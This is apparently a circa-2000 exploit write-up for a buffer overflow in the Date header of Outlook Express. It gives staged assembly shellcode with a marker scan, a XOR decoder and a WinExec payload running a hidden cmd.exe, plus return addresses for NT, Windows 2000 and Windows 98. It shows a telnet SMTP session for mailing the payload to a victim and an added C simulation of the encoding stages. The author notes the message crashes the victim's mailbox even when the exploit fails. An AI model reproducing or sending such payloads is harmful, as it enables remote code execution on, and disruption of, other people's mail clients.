------------- OutLook Date Header Xploit. -----------------
 
(First, I apologize for my broken English. If you want this text in proper Spanish :)
I will send it to you; surely it would be easier to understand.
Anyway, this is exploit info, so who cares about the rest.)


This program creates the code needed to exploit the Date header buffer
overflow in Outlook (Outlook Express).

The file it creates (XPLOIT.TXT) looks something like this (the binary bytes
after the time zone are the raw code, so they show up as garbage characters):

-------------------------------------------------
Date: Thu, 13 Jun 2000 12:33:16 +1VZ-A蠷@B9uf-R+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'p1111

RY-Af9AAt1پ[--fI+-[-+fI+[-fIfIʳٸ+_߳-_+Ϧ_-_AA
--------------------------------------------------

There are 5 .TXT files holding the code split into pieces; joined together
they give the code shown above.


CODE0.TXT
		---------------------------------
		push esi           // ESI points into the overflowed buffer when the
		pop edx            // CALL ESI lands, i.e. somewhere in the Outlook stack
		add edx,10
		mov eax,$EAFAFF8A  // Marker that tags where CODE1 begins; stored one
		inc eax            // less than the real value (EAFAFF8Bh) so the marker
		                   // bytes never appear literally inside CODE0 and the
		                   // scan cannot match its own instruction bytes
	@bucle:
		inc edx
		cmp ds:[edx],eax   // Scan upward until the dword 8B FF FA EA is found
		jnz @bucle
		add dx,4           // Skip the 4 marker bytes
		push edx
		ret                // Jumps to the start of CODE1.TXT (its @code label)
		---------------------------------

		First stage of the code. It scans the stack for the marker that
		precedes the rest of the code and then jumps there.
		

OFFSET_NT.TXT
		---------------------------------
		ED,27,BD,70    ----- Address of a CALL ESI in Kernel32.dll, written
		                     little-endian (i.e. 70BD27EDh)
		---------------------------------
		This is a small file with the address of any CALL ESI in some loaded DLL.
		There are 3 such files, because each system (NT, W2K or W9x) has a different
		address. If the exploit does not run the first time, or the victim gets an
		error message when Outlook tries to download the message, they probably have
		a different version of the DLL (the addresses I found are for NT SP6 and the
		W2K English version). In any case you can find a CALL ESI for your Windows
		version with any debugger.
CODE1.TXT
		-----------------------------------
		@mcode: DB $8B,$FF,$FA,$EA       // Marker CODE0 scans for (EAFAFF8Bh in memory)

		@code:
		    push edx
		    pop ecx
		    add ecx,17                   // With the inc below, skips this decoder's
		@b3:                             // own 18 bytes, so decoding starts at @ini_code
		    inc ecx
		    cmp word ptr ds:[ecx],$4141  // Decode until the (still encoded) word 4141h
		    je @ini_code
		    xor byte ptr ds:[ecx],$99    // Decode one byte in place
		    jmp @b3

		@ini_code:                       // Decoded CODE2 starts here

		-----------------------------------
		This is the loader for the rest of the exploit: it decodes the payload
		(CODE2) and the command line (CODE3) in place. This is necessary because
		the buffer cannot contain null bytes (a 00h ends the header), and the
		payload is full of them: the import-table addresses such as 01001014h and
		the terminating 00h of each string. So everything after @ini_code is stored
		XORed with 99h. Two consequences: the 4141h check runs on the still-encoded
		bytes, so the terminator is stored in plain form, and a plaintext byte 99h
		cannot be used anywhere in the payload because it would encode to 00h.
CODE2.TXT
		-----------------------------------

		    add edx,45+$12          // EDX -> the 'Kernel32.dll' string below

		    mov eax,ds:[$01001014]  // Import-table slot holding GetModuleHandle
		    push edx                // Save EDX
		    push edx                // lpModuleName = 'Kernel32.dll'
		    call eax                // GetModuleHandle('Kernel32.dll')
		    pop edx
		    push edx                // Save EDX again
		    add edx,13              // EDX -> the 'WinExec' string (13 = length of 'Kernel32.dll',0)

		    push edx                // lpProcName = 'WinExec'
		    push eax                // hModule returned by GetModuleHandle
		    mov eax,ds:[$01001038]  // Import-table slot holding GetProcAddress
		    call eax                // EAX = GetProcAddress(hModule,'WinExec')
		    pop edx

		    add edx,21              // EDX -> the command line (13 + 8 bytes of strings)
		    push 00h                // uCmdShow = SW_HIDE. Use 0Ah (SW_SHOWDEFAULT) if you
		                            // want the command window to be visible: in CODE2.TXT
		                            // look for the bytes F3h,99h,CBh (push 0 / push edx,
		                            // XORed) and change the 99h to 93h (0Ah xor 99h = 93h)
		    push edx                // lpCmdLine
		    call eax                // WinExec(lpCmdLine, uCmdShow)

		    mov eax,ds:[$01001010]  // Import-table slot holding ExitProcess
		    call eax                // ExitProcess

		    @kernel: db 'Kernel32.dll',0
		    @api1:   db 'WinExec',0

		-----------------------------------
		Payload. This part calls three Windows APIs. It needs the address of
		WinExec, so it calls GetModuleHandle and GetProcAddress; the addresses of
		those two (and of ExitProcess) are read from Outlook's own import table.
		The exploit can also run on other versions of Outlook (Outlook 2000), but
		you must have the import-table addresses of GetProcAddress, GetModuleHandle
		and ExitProcess for that build (easy to find with any program that shows
		the import table of an exe file). When you have those addresses (something
		like 01001000h, 01001038h, etc.) you must XOR them with 99h and put them in
		this part of the code, since CODE2 is stored encoded.

CODE3.TXT
		-----------------------------------
		FA F4 FD B7 FC E1 FC 99 41 41   -- 'cmd.exe',0 with every byte XORed
		-----------------------------------	   with 99h, followed by the plain 4141h

		This is your command line as the program stores it: each byte XORed with
		99h (a simple XOR 99h). You can create your own file with a different
		command line, but be sure to XOR every byte, including the terminating 00h,
		with 99h, and to add 4141h at the end of the file; those two bytes are what
		the decoder in CODE1 uses to find the end of the code, and they are not XORed.

		The command line has to end with CR+LF (0Dh,0Ah), because the program
		overwrites those 2 bytes with the 4141h that marks the end of the string.
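To see how CODE0, CODE1 and CODE3 fit together, here is an added C example (it is not part of the original exploit package and not the author's generator program) that simulates the three stages on a constructed buffer instead of Outlook's stack: it encodes a command line the way CODE3.TXT is built, scans for the marker as CODE0 does, and decodes in place as CODE1 does. The buffer layout, the landing offset of the marker and the 90h bytes standing in for the decoder's own code are assumptions of this example; the key 99h, the marker 8B FF FA EA, the 18-byte skip and the 4141h terminator are taken from the listings above.

```c
/*
 * Added example: user-mode simulation of the staged payload described above.
 * Not the original exploit code. Layout and stand-in bytes are assumptions;
 * key, marker, skip length and terminator come from the listings.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define XOR_KEY     0x99
#define STAGE1_SKIP 18                  /* add ecx,17 followed by inc ecx */

/* EAFAFF8Bh (mov eax,$EAFAFF8A ; inc eax) as it sits in little-endian memory */
static const uint8_t MARKER[4] = { 0x8B, 0xFF, 0xFA, 0xEA };

/* CODE3 encoder: XOR the command line, including its NUL, with 99h and append
 * the plain 41 41 terminator. Returns bytes written, or 0 when the result
 * could not work: a plaintext 99h encodes to 00h (ends the header), and an
 * encoded pair 41 41 (plaintext D8 D8) would stop the decoder early. */
size_t encode_payload(const char *cmd, uint8_t *out, size_t cap)
{
    size_t n = strlen(cmd) + 1;         /* WinExec needs the terminating NUL */
    if (n + 2 > cap)
        return 0;
    for (size_t i = 0; i < n; i++) {
        uint8_t c = (uint8_t)cmd[i] ^ XOR_KEY;
        if (c == 0x00 || (i > 0 && out[i - 1] == 0x41 && c == 0x41))
            return 0;
        out[i] = c;
    }
    out[n] = 0x41;
    out[n + 1] = 0x41;
    return n + 2;
}

/* CODE0: scan forward from `start` for the marker and return the address just
 * past it. The real stage has no bound; here NULL means not found in `limit`. */
const uint8_t *find_marker(const uint8_t *start, size_t limit)
{
    for (size_t i = 0; i + sizeof MARKER <= limit; i++)
        if (memcmp(start + i, MARKER, sizeof MARKER) == 0)
            return start + i + sizeof MARKER;
    return NULL;
}

/* CODE1: `code` is where stage 0 handed over (@code). Skip the decoder's own
 * bytes, then XOR in place until the still-encoded word is 4141h. Returns the
 * number of bytes decoded, or SIZE_MAX if `limit` is reached first. */
size_t decode_in_place(uint8_t *code, size_t limit)
{
    size_t i = STAGE1_SKIP, decoded = 0;
    while (i + 2 <= limit) {
        if (code[i] == 0x41 && code[i + 1] == 0x41)
            return decoded;
        code[i] ^= XOR_KEY;             /* like xor byte ptr ds:[ecx],$99 */
        i++;
        decoded++;
    }
    return SIZE_MAX;
}

/* End-to-end run on a constructed 256-byte "stack":
 *   [filler 'x' ...][marker][18 bytes standing in for CODE1][encoded cmd][41 41]
 * Copies the recovered command line into `out`; returns 1 on success. */
int simulate(const char *cmd, char *out, size_t cap)
{
    uint8_t stack[256];
    memset(stack, 'x', sizeof stack);   /* the x padding seen in XPLOIT.TXT */

    size_t pos = 40;                    /* assumed offset where the marker lands */
    memcpy(stack + pos, MARKER, sizeof MARKER);
    pos += sizeof MARKER;
    uint8_t *code1 = stack + pos;
    memset(code1, 0x90, STAGE1_SKIP);   /* stand-in for the decoder's 18 bytes */
    pos += STAGE1_SKIP;
    if (encode_payload(cmd, stack + pos, sizeof stack - pos) == 0)
        return 0;

    const uint8_t *hit = find_marker(stack, sizeof stack);
    if (hit != code1)                   /* stage 0 must land exactly on @code */
        return 0;
    size_t limit = sizeof stack - (size_t)(hit - stack);
    if (decode_in_place((uint8_t *)hit, limit) == SIZE_MAX)
        return 0;

    const char *plain = (const char *)hit + STAGE1_SKIP;  /* what WinExec would get */
    if (strlen(plain) + 1 > cap)
        return 0;
    memcpy(out, plain, strlen(plain) + 1);
    return 1;
}

int main(void)
{
    uint8_t enc[64];
    char recovered[64];
    size_t n = encode_payload("cmd.exe", enc, sizeof enc);
    for (size_t i = 0; i < n; i++)
        printf("%02X ", enc[i]);        /* same bytes as listed in CODE3.TXT */
    putchar('\n');
    if (simulate("cmd.exe", recovered, sizeof recovered))
        printf("decoded command line: %s\n", recovered);
    return 0;
}
```

Built with any C99 compiler, the program prints FA F4 FD B7 FC E1 FC 99 41 41, the exact content of CODE3.TXT, and then the command line recovered after the marker scan and in-place decode. The encoder refuses the two inputs the page's loader cannot survive: a plaintext 99h (it becomes 00h and truncates the header) and a plaintext D8 D8 (it becomes 41 41 and stops the decoder before the real terminator).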
		

The program creates a file called XPLOIT.TXT. To send it by email, copy and paste
the content of this file after the DATA command in any SMTP session.

sample:
	telnet any.smtp.server 25
	220 localhost(127.0.0.1) SMTP MAIL Jun 22 2000/20:35:11; Sun, 13 Aug 20
	HELO
	250 localhost Hello localhost, welcome! 
	MAIL FROM: dubi@dubi.duuu
	250 <DUBI@DUBI.DUU.CO.UK>... Sender ok
	RCPT TO: lamer@lamerland.com 
	250 <lamer@lamerland.com>... Recipient ok
	DATA
	354 Enter mail, end with "." on a line by itself
         
	<here paste the code from the file XPLOIT.TXT>
	 
	.
	250 3996C380.0000002A Message accepted for delivery     
	QUIT


I tested the exploit on Windows 2000, Windows NT 4 SP6 and Windows 98, all three
with Outlook Express, and it worked fine.
There are 2 reasons why the exploit might not run: the address of the CALL ESI
(find one with some debugger) and the import-table addresses of the 3 APIs the
payload takes from the Outlook exe (GetModuleHandle, GetProcAddress and
ExitProcess; WinExec itself is resolved at run time).
I think it is easy to find these addresses on your system for any version of Outlook.

Even if the exploit does not run, it will certainly wreck the victim's mailbox,
because Outlook crashes when it tries to parse the Date header.
       
Thanks to <dark spyrit> for his paper Win32 Buffer Overflows (Location, Exploitation and Prevention).

fbyte@mailcity.com